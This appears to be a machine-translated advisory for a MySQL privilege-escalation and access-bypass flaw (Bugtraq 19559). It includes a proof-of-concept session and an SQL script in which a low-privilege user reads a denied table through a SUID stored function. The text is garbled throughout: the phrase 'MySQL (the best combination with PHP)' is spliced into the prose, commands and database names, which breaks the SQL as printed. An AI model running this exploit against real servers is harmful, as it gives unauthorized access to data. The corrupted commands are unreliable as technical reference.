The following articles mainly describe the actual application of MySQL permission escalation and security restriction bypass vulnerabilities. I saw the actual application of MySQL permission escalation and security restriction bypass vulnerabilities on the relevant website a few days ago, I think it's good. I will share it with you today.
Affected Systems:
MySQL (the best combination with PHP) AB MySQL (the best combination with PHP) <= 5.1.10
Description:
Bugtraq id: 19559
MySQL (the best combination with PHP) is a widely used open-source relational database system with running versions on various platforms.
In MySQL (the best combination with PHP), users with access permissions but no creation permissions can create new databases that are only different from those with names and letters. Successful exploitation of this vulnerability requires that the file system running MySQL (the best combination with PHP) support case-sensitive file names.
In addition, because the suid routine parameters are calculated in the wrong security environment, attackers can execute arbitrary DML statements with the permissions of the routine definer through stored routines. Successful attacks require you to have the EXECUTE permission on the stored routines.
Test method:
Warning: The following procedures (methods) may be offensive and only for security research and teaching. Users are at your own risk !]
1. Create a database
- $ MySQL (the best combination with PHP)-h my. MySQL (the best combination with PHP). server-u sample-p-A sample
- Enter password:
- Welcome to the MySQL (the best combination with PHP) monitor. Commands end with; or \ g.
- Your MySQL (best combination with PHP) connection id is 263935 to server version: 4.1.16-standard
- MySQL (the best combination with PHP)> create database another;
- ERROR 1044: Access denied for user 'sample' @ '%' to database 'another'
- MySQL (the best combination with PHP)> create database sAmple;
- Query OK, 1 row affected (0.00 sec)
2. Permission Improvement
- -- Disable_warnings
- Drop database if exists MySQL (the best combination with PHP) test1;
- Drop database if exists MySQL (the best combination with PHP) test2;
- Drop function if exists f_suid;
- -- Enable_warnings
- # Prepare playground
- Create database MySQL (the best combination with PHP) test1;
- Create database MySQL (the best combination with PHP) test2;
- Create user malory @ localhost;
- Grant all privileges on MySQL (the best combination with PHP) test1. * to malory @ localhost;
- # Create harmless (but SUID !) Function
- Create function f_suid (I int) returns int return 0;
- Grant execute on function test. f_suid to malory @ localhost;
- Use MySQL (the best combination with PHP) test2;
- # Create table in which malory @ localhost will be interested but to which
- # He won't have any access
- Create table t1 (I int );
- Connect (malcon, localhost, malory, MySQL (the best combination with PHP) test1 );
- # Correct malory @ localhost don't have access to MySQL (the best combination with PHP) test2.t1
- -- Error ER_TABLEACCESS_DENIED_ERROR
- Select * from MySQL (the best combination with PHP) test2.t1;
- # Create function which will allow to exploit security hole
- Delimiter |;
- Create function f_edevil ()
- Returns int
- SQL security invoker
- Begin
- Set @ a: = current_user ();
- Set @ B: = (select count (*) from MySQL (the best combination with PHP) test2.t1 );
- Return 0;
- End |
- Delimiter; |
- # Again correct
- -- Error ER_TABLEACCESS_DENIED_ERROR
- Select f_edevil ();
- Select @ a, @ B;
- # Oops !!! It seems that f_edevil () is executed in the context
- # F_suid () definer, so malory @ locahost gets all info that he wants
- Select test. f_suid (f_edevil ());
- Select @ a, @ B;
- Connection default;
- Drop user malory @ localhost;
- Drop database MySQL (the best combination with PHP) test1;
- Drop database MySQL (the best combination with PHP) test2;
Suggestion:
Vendor patch: MySQL (the best combination with PHP) AB. Currently, the vendor has released an upgrade patch to fix this security problem. Please download it from the vendor's homepage.